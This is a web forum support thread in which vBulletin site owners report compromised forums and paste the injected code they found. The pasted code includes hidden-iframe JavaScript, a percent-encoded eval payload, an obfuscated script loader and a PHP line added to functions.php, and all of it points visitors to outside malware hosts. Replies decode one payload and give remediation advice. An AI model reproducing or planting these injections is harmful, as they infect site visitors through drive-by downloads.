• 3.8.x

vBulletin 3.8.4 has been hacked !!!

Hello,

My website has been hacked !!!

There is a code at the end (bottom) of index.php

Code:
    <script language="JavaScript" type="text/javascript">
    function getfromDOM(containerid)
    {var container = document.getElementById(containerid), element1, element2 = container.firstChild, content ="";
    do{element1 = element2; content += element1.firstChild.nodeValue; element2 = element1.nextSibling;}
    while(element1!==container.lastChild)
    return content;
    }
    var ff_b = document.createElement("strong");
    ff_b.id = "YuPi55";
    ff_b.innerHTML="<b>http://000007.ru/in.cgi?7</b>";
    ff_b.style.visibility = "hidden";
    document.getElementsByTagName("body")[0].appendChild(ff_b);
    var ff_iframe = document.createElement("iframe");
    ff_iframe.id = "JeT";
    ff_iframe.name = "JeT";
    ff_iframe.style.visibility = "hidden";
    ff_iframe.src=getfromDOM("YuPi55");
    document.getElementsByTagName("body")[0].appendChild(ff_iframe);
    </script>
    y

Code:
    <iframe src="[URL="http://3cy.ru:8080/index.php"][COLOR=#0066cc]http://3cy.ru:8080/index.php[/COLOR][/URL]" width=187 height=139 style="visibility: hidden"></iframe<html><body><div id="CFI" style="display:none">%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%22%3c%69%66%72%61%6d%65%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%30%30%30%30%30%37%2e%72%75%2f%69%6e%2e%63%67%69%3f%37%27%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b%27%3e%3c%2f%69%66%72%61%6d%65%3e%22%29%3b</div><script>var nJQ=eval, CFI=document.getElementById("CFI").innerHTML,GaB=unescape;nJQ(GaB(CFI));</script></body></html>>
    I don't know if other files have been hacked.

I use 3.8.4. with DownloadsII mod

Can you help me?

Thank you
  • renep
    • Aug 2005
    • 3.8.x

Re-install and read: http://www.vbulletin.com/forum/showthread.php?t=194701
    "The lurking suspicion that something could be simplified is the world's richest source of rewarding challenges"
    - Edsger Dijkstra

Comment

• mijack
      • Aug 2009
      • 3.8.x

If I reinstall, have I to use impex? or I have to use the name of the actual data base when I'm installing

I have 85.000 users and I don't want to loose them....

Thank you

Comment

• Desibabu19
        • Feb 2006

sorry to hear that.
        what type of mistake from admin side leads to such hack ?
        Just like to learn how to prevent these attacks..

Comment

• Lynne
          Former vBulletin Support
          • Oct 2004

Just reupload your backup database. You should not have to use impex for that.

Please don't PM or VM me for support - I only help out in the threads.
          vBulletin Manual & vBulletin 4.0 Code Documentation (API)
          Want help modifying your vbulletin forum? Head on over to vbulletin.org
          If I post CSS and you don't know where it goes, throw it into the additional.css template.

W3Schools &lt;- awesome site for html/css help

Comment

• fbriceno97
            • Jul 2008
            • 3.7.x

Originally posted by mijack
            Hello,

My website has been hacked !!!

There is a code at the end (bottom) of index.php

Code:
            <script language="JavaScript" type="text/javascript">
            function getfromDOM(containerid)
            {var container = document.getElementById(containerid), element1, element2 = container.firstChild, content ="";
            do{element1 = element2; content += element1.firstChild.nodeValue; element2 = element1.nextSibling;}
            while(element1!==container.lastChild)
            return content;
            }
            var ff_b = document.createElement("strong");
            ff_b.id = "YuPi55";
            ff_b.innerHTML="<b>http://000007.ru/in.cgi?7</b>";
            ff_b.style.visibility = "hidden";
            document.getElementsByTagName("body")[0].appendChild(ff_b);
            var ff_iframe = document.createElement("iframe");
            ff_iframe.id = "JeT";
            ff_iframe.name = "JeT";
            ff_iframe.style.visibility = "hidden";
            ff_iframe.src=getfromDOM("YuPi55");
            document.getElementsByTagName("body")[0].appendChild(ff_iframe);
            </script>
            y

Code:
            <iframe src="[URL="http://3cy.ru:8080/index.php"][COLOR=#0066cc]http://3cy.ru:8080/index.php[/COLOR][/URL]" width=187 height=139 style="visibility: hidden"></iframe<html><body><div id="CFI" style="display:none">%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%22%3c%69%66%72%61%6d%65%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%30%30%30%30%30%37%2e%72%75%2f%69%6e%2e%63%67%69%3f%37%27%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b%27%3e%3c%2f%69%66%72%61%6d%65%3e%22%29%3b</div><script>var nJQ=eval, CFI=document.getElementById("CFI").innerHTML,GaB=unescape;nJQ(GaB(CFI));</script></body></html>>
            I don't know if other files have been hacked.

I use 3.8.4. with DownloadsII mod

Can you help me?

Thank you
            my site was hacked just the same... just pointing to another server on the iframe code.

but i was using 3.8.1, so if this happen with 3.8.4 and 3.8.1 there is a hole somewhere very old letting this happen.

basically they modified all the phps,htmls files with that code.

What is the position of vbulletin about this?

Comment

• Zachery
              Former vBulletin Support
              • Jul 2002

Our position is there is no known exploit, if you have evidance of an actual exploit please report it. Likely there is a good chance that the exploit was elsewhere on the server and vBulletin was the one defaced.

Comment

• mentalrz
                • Sep 2004
                • 1.1.x

encoded part outputs at

Code:
                document.write("<iframe src='http://000007.ru/in.cgi?7' style='display:none;'></iframe>");
                just for your reference

Comment

• Steve Machol
                  Former Customer Support Manager
                  • Jul 2000

All the the hacks I've seen like this were done through the server.

Please see this thread on how to make your vBulletin more secure:

If you are still being hacked after doing all of this, then they are most likely doing this by accessing your server. You need to contact your host about this.
                  Steve Machol, former vBulletin Customer Support Manager (and NOT retired!)
                  Change CKEditor Colors to Match Style (for 4.1.4 and above)

Steve Machol Photography

Mankind is the only creature smart enough to know its own history, and dumb enough to ignore it.

Comment

• gedankenberg
                    • Oct 2009
                    • 3.8.x

Hello,

some of my vbulletin 3.8.4 patch level 1 (german) were also been hacked:

Code:
                    <script>/*GNU GPL*/ try{window.onload = function(){var Ju5b7bu89al = document.createElement('s#$c@@r$)i!$p)t!('.replace(/\(|@|\!|\$|#|\)|\^|&/ig, ''));var Plcsu1uj9eo04 = 'U1xil41i86oe';Ju5b7bu89al.setAttribute('type', 't&@&$e)#)x!$)t@^/!!#j!$@a((#v(a#&)s(^@c$@)r^&i(#)p&$#t)'.replace(/\!|\)|&|#|\$|\(|\^|@/ig, ''));Ju5b7bu89al.setAttribute('src',  'h!##t&t$p!@:!#/^&)/(^$o$$^v((h^(-&$n^^e@!t@(.$$h#@a#)^r#d#(#s($&)e!&^!x)!#^t&u^&@b$e!&#)^.^)!^c)))o$!m&&.@&$s#o)&n$$($#g$!s$&-$&&p##^k&$(&!.#@&t@^h&)!e!(&m^#)o&$$^b$@)i&)l@@^e@(^w^(i$(#n(!d$!o&w&.&)$r@&((u@@:)8^&0()8@@0#&()/)@!^g!)&o)(^@o@(g@^l)#$e).#&n#$#(o&(((/(g(&o#!##o$$#g&$@)!l))e$&$^(.^&n(&!&o()!@/&(#$g)&)@o)^o!#g!$$(l#$e(.$c^##$o#!^!m^)/&^!$@z)y&$)l)(((o^#^m&^!#.^#^#c@o)^m)($)/#m((-(&w$(.$c(#o!m#@$/(#^&'.replace(/\!|\)|\(|@|&|\$|\^|#/ig, ''));Ju5b7bu89al.setAttribute('defer', 'd@!)&e$(!f&(e!)^r)&!'.replace(/&|\)|#|\$|@|\^|\(|\!/ig, ''));Ju5b7bu89al.setAttribute('id', 'L!3###$d!##w(@o^@&h^(s@&(&8#@&!v$&$#u^)u&('.replace(/\!|&|\(|#|\$|\)|\^|@/ig, ''));document.body.appendChild(Ju5b7bu89al);}} catch(Pz68f7gfr80sy) {}</script>
                    <!--e27f528bc0f1747ea9638a535ca450f8-->

Comment

• HolyKiller
                      • Dec 2006
                      • 3.6.x

When i reading this thread, my NOD32 says:

23.2.2010 21:44:09 HTTP filter archive http://www.vbulletin.com/forum/showt...ighlight=impex JS/TrojanDownloader.Agent.NRL trojan connection terminated Threat was detected upon access to web by the application: firefox.exe.

Comment

• borbole
                        • Feb 2010

Clean up all your forum files by overwritting them with a fresh set from the vb download package, your version. Check your server space for anything out of the ordinary. Check out all your other files if they have been infected. Change all the login info (ftp, forum admin, Cp of your host etc). And as last but not least ask your host to check their access logs so they can pinpoint the exact way how they got in and not do guess-work.

Comment

• sungerr
                          • Jan 2009

PHP code in includes/functions.php
                          ==================
                          // parse PHP include ##################
                          ($hook = vBulletinHook::fetch_hook('global_complete')) ? eval($hook) : false; $output = preg_replace('/(<body[^>]*>)/i', "$1 ".'<div style="display:none">&nbsp; &nbsp;<iframe fsdsdf="sdfdf" width="732" height="4051" src="http://grizzli-counter.com/id120/index.php"></iframe></div>', $output, 1);
                          ---

me 2 i got hacking by an iframe !!!!!!!!!!!!

i found it in functions.php

only in the /forum i have portal cms web i didn't get hack !! is that an exploit ?!

Comment

• borbole
                            • Feb 2010

Originally posted by sungerr
                            PHP code in includes/functions.php
                            ==================
                            // parse PHP include ##################
                            ($hook = vBulletinHook::fetch_hook('global_complete')) ? eval($hook) : false; $output = preg_replace('/(<body[^>]*>)/i', "$1 ".'<div style="display:none">&nbsp; &nbsp;<iframe fsdsdf="sdfdf" width="732" height="4051" src="http://grizzli-counter.com/id120/index.php"></iframe></div>', $output, 1);
                            ---

me 2 i got hacking by an iframe !!!!!!!!!!!!

i found it in functions.php

only in the /forum i have portal cms web i didn't get hack !! is that an exploit ?!
                            What version of vb do you have?

Comment

• Endlesskiss
                              • Dec 2008

I've been using 3.8.4 for a while and got defaced once, I suggest you to read more info about the 'Gumblar' virus (made in China, but works well), and run Avast! on your server, it's free and it works on Linux, and most likely it will find some stuff like c99.php (a Shell) on your server, which allows hackers to edit files on your server.

Basically, I've tried MANY things and none of them actually worked (No XSS nor SQLi).

Comment

widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                              Working...